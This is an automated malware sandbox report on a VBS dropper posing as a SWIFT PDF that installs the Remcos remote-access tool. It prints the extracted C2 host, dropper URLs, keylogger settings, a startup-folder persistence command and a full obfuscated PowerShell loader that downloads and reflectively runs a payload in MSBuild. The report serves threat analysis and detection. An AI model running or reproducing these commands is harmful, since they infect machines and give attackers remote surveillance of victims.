Analysis

  • max time kernel
    149s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14-11-2024 07:07

General

  • Target

    SWIFT103202414111523339800111124.pdf.vbs

  • Size

    1KB

  • MD5

    1571d85ecdbd26ac45e3f2639e7e4310

  • SHA1

    b1dd5db95e88132a5052b451b757b9ce486bccc0

  • SHA256

    167887f979c648809aa8328edba96d972b401f74b06ee5026ea073efd4d9b432

  • SHA512

    e0d9a19616e3762c67b0f2d24a92529c3bbd26f01938768c0d213470628df97e7f2bf6aa7c0bdf60018590862e500c1ad6bb6e4b0585b4be47d1b06dd9fb4bcf

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

exe.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

Extracted

Family

remcos

Botnet

NOV

C2

alpha147.ddns.net:35890

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    vlc.exe

  • copy_folder

    vlc

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    true

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-1KOA72

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • startup_value

    rmc

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 25 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SWIFT103202414111523339800111124.pdf.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Drops startup file
    • Suspicious use of WriteProcessMemory
    PID:3512
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\SWIFT103202414111523339800111124.pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.JJC.vbs')')
      2⤵
      • System Network Configuration Discovery: Internet Connection Discovery
      • Suspicious use of WriteProcessMemory
      PID:4752
      • C:\Windows\system32\PING.EXE
        ping 127.0.0.1 -n 10
        3⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Runs ping.exe
        PID:2828
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\SWIFT103202414111523339800111124.pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.JJC.vbs')')
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:208
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtzVHJpbkddJFZFcmJvc0VQckVmZVJlbmNFKVsxLDNdKydYJy1qT0luJycpICggKCgnWFpsaW1hZ2VVcmwgPSA0cWpodHRwczovLzEwMTcuZmlsZScrJ21haWwuY29tL2FwaS9maWxlL2dldD9maWxlJysna2V5PTJBYV9iV285UmV1NDV0N0JVMWtWZ3NkOXBUOXBnU1NsdlN0R3JuVElDZkZobVRLajNMQzZTUXRJY09jX1QzNXcmcGtfdicrJ2lkPWZkNGY2MTRiYjIwOWM2MicrJ2MxNzMnKycwJysnOTQ1MTc2YTA5MDRmIDRxajtYWmx3ZWJDbGllbnQgPSBOZXcnKyctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O1habGltYWdlQnl0ZXMgPSBYWmx3ZWJDbGllbnQuRG93bmxvYWREYXRhKFhabGltYWdlVXJsKTtYWmxpbWFnZVRleHQgPSBbU3lzdGVtLlQnKydleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0JysncmluZyhYWmxpbWFnZUJ5dGVzKTtYWmxzdGFydEZsYWcgPSA0cWo8PEJBU0U2NF9TVEFSVD4+NHFqO1habGVuZEZsYWcgPSA0cWo8PEJBU0U2NF9FTkQ+PjRxajtYWmwnKydzdGFydEluZGUnKyd4ID0gWFpsaW1hZ2VUZXh0LkluZGV4T2YoWFpsc3RhcnRGbGFnKTtYWmxlbmRJbmRleCA9IFhabGltYWdlVGV4dC5JbmRleE9mKFhabGVuZEZsYWcpO1habHN0YXJ0SW5kZXggLWdlIDAgLWFuZCBYWmxlbmRJbmRleCcrJyAtZ3QgWFpsc3RhcnRJbmRleCcrJztYWmxzdGFydEluZGV4ICs9IFhabHN0YXJ0RmxhZy5MZW5ndGg7WFpsYmFzZTY0TGVuZ3RoID0gWFpsZW5kSScrJ25kZXggLSBYWmxzdGFydEluZGV4O1habGJhc2U2NENvbW1hbmQgPSBYWmxpbWFnZVRleHQuU3ViJysnc3RyaW5nKFhabHN0YXJ0SW5kZScrJ3gsIFhabGJhc2U2NExlbmd0aCk7WFpsYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoWFpsYmFzZTY0Q29tbWFuZC5Ub0NoYScrJ3JBcnJheSgpIHAzayBGb3JFYWNoLU9iamVjdCB7IFhabF8gfSlbLTEuLi0oWFpsYmFzZTY0Q29tbWFuZC5MZW5ndGgpXTtYWmxjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKFhabGJhc2U2NFJldmVyc2VkKTtYWmxsJysnb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoWFpsY29tbWFuZEJ5dGVzKTtYWmx2YWlNZXRob2QgPSAnKydbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKDRxalZBJysnSTRxaicrJyk7WFpsdmFpTWV0aG9kLkludm9rZShYWmxudWxsLCBAKDRxajAvTFI5Q2cvZC9lZS5lJysndHNhcC8vOnNwdHRoNHFqLCA0cWpkJysnZXNhdGl2YWRvNHFqLCAnKyc0cWpkZXNhdGl2YWRvNHFqLCA0cWpkZXNhdGl2YWRvNHFqLCA0cWpNU0J1aWxkNHFqLCA0cWpkZXNhdGl2YWRvNHFqLCA0cWpkZXNhdGl2YWRvNHFqLDRxamRlc2F0aXZhZG80cWosNHFqZGVzYXRpdmFkbzRxaiw0cWpkZXNhdGl2YWRvNHFqLDRxamRlc2F0aXZhZG80cWosJysnNHFqZGVzYScrJ3RpdmFkbzRxaiw0cWoxNHFqLDRxamRlc2F0aXZhZG80cWopKTsnKSAgLUNSZVBsQUNlKFtjaEFyXTg4K1tjaEFyXTkwK1tjaEFyXTEwOCksW2NoQXJdMzYgLVJFcGxhY2UnNHFqJyxbY2hBcl0zOSAgLVJFcGxhY2UgJ3AzaycsW2NoQXJdMTI0KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3940
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([sTrinG]$VErbosEPrEfeRencE)[1,3]+'X'-jOIn'') ( (('XZlimageUrl = 4qjhttps://1017.file'+'mail.com/api/file/get?file'+'key=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_v'+'id=fd4f614bb209c62'+'c173'+'0'+'945176a0904f 4qj;XZlwebClient = New'+'-Object System.Net.WebClient;XZlimageBytes = XZlwebClient.DownloadData(XZlimageUrl);XZlimageText = [System.T'+'ext.Encoding]::UTF8.GetSt'+'ring(XZlimageBytes);XZlstartFlag = 4qj<<BASE64_START>>4qj;XZlendFlag = 4qj<<BASE64_END>>4qj;XZl'+'startInde'+'x = XZlimageText.IndexOf(XZlstartFlag);XZlendIndex = XZlimageText.IndexOf(XZlendFlag);XZlstartIndex -ge 0 -and XZlendIndex'+' -gt XZlstartIndex'+';XZlstartIndex += XZlstartFlag.Length;XZlbase64Length = XZlendI'+'ndex - XZlstartIndex;XZlbase64Command = XZlimageText.Sub'+'string(XZlstartInde'+'x, XZlbase64Length);XZlbase64Reversed = -join (XZlbase64Command.ToCha'+'rArray() p3k ForEach-Object { XZl_ })[-1..-(XZlbase64Command.Length)];XZlcommandBytes = [System.Convert]::FromBase64String(XZlbase64Reversed);XZll'+'oadedAssembly = [System.Reflection.Assembly]::Load(XZlcommandBytes);XZlvaiMethod = '+'[dnlib.IO.Home].GetMethod(4qjVA'+'I4qj'+');XZlvaiMethod.Invoke(XZlnull, @(4qj0/LR9Cg/d/ee.e'+'tsap//:sptth4qj, 4qjd'+'esativado4qj, '+'4qjdesativado4qj, 4qjdesativado4qj, 4qjMSBuild4qj, 4qjdesativado4qj, 4qjdesativado4qj,4qjdesativado4qj,4qjdesativado4qj,4qjdesativado4qj,4qjdesativado4qj,'+'4qjdesa'+'tivado4qj,4qj14qj,4qjdesativado4qj));') -CRePlACe([chAr]88+[chAr]90+[chAr]108),[chAr]36 -REplace'4qj',[chAr]39 -REplace 'p3k',[chAr]124) )"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2456
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
          4⤵
            PID:1292
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of SetWindowsHookEx
            PID:4480

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\ProgramData\remcos\logs.dat

      Filesize

      144B

      MD5

      8b0c319bf0d03d5d44b2d4d709dafb6b

      SHA1

      64e14c86e4b4afca87f5d320437cbf71f1126159

      SHA256

      64390ab8771f187583d935bc616ee2468a664c01b7e023915d8c719b22b84ef0

      SHA512

      ad0a95b0386bdf8f8ce9e4152c0a3cdc3d75ac92702f469f906b3cffb4a47c0c83fa4c6ce3934bea596a3cbe729b03408ef93d7abcf6873354e5e3d112c97606

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      d85ba6ff808d9e5444a4b369f5bc2730

      SHA1

      31aa9d96590fff6981b315e0b391b575e4c0804a

      SHA256

      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

      SHA512

      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      d28a889fd956d5cb3accfbaf1143eb6f

      SHA1

      157ba54b365341f8ff06707d996b3635da8446f7

      SHA256

      21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

      SHA512

      0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      64B

      MD5

      4b27de34ffcc41b41d4585bd0a62df7e

      SHA1

      f2b1a3f5bf02c6d439eaa13b8152d8af6056a11f

      SHA256

      7bb4e9d5456bc928981cd9861bd0ad8e46087511dfaebe006773cd492b6a4011

      SHA512

      bfcd6e6116002b37c1c6222b70882b75dd74aa5aef478f11a89456716a1d5cf662c7bc85bb89b10c9480d8e5b220513fa6364d2ec405df6874b23e2e41170f7e

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vbn13b35.2mf.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/208-17-0x00007FFF94E20000-0x00007FFF958E1000-memory.dmp

      Filesize

      10.8MB

    • memory/208-12-0x00007FFF94E20000-0x00007FFF958E1000-memory.dmp

      Filesize

      10.8MB

    • memory/208-14-0x00007FFF94E20000-0x00007FFF958E1000-memory.dmp

      Filesize

      10.8MB

    • memory/208-13-0x00007FFF94E20000-0x00007FFF958E1000-memory.dmp

      Filesize

      10.8MB

    • memory/208-2-0x0000016CFF460000-0x0000016CFF482000-memory.dmp

      Filesize

      136KB

    • memory/208-1-0x00007FFF94E23000-0x00007FFF94E25000-memory.dmp

      Filesize

      8KB

    • memory/2456-38-0x00000211C36C0000-0x00000211C3818000-memory.dmp

      Filesize

      1.3MB

    • memory/4480-49-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/4480-53-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/4480-47-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/4480-48-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/4480-41-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/4480-50-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/4480-51-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/4480-44-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/4480-39-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/4480-60-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/4480-61-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/4480-68-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/4480-69-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/4480-85-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/4480-84-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB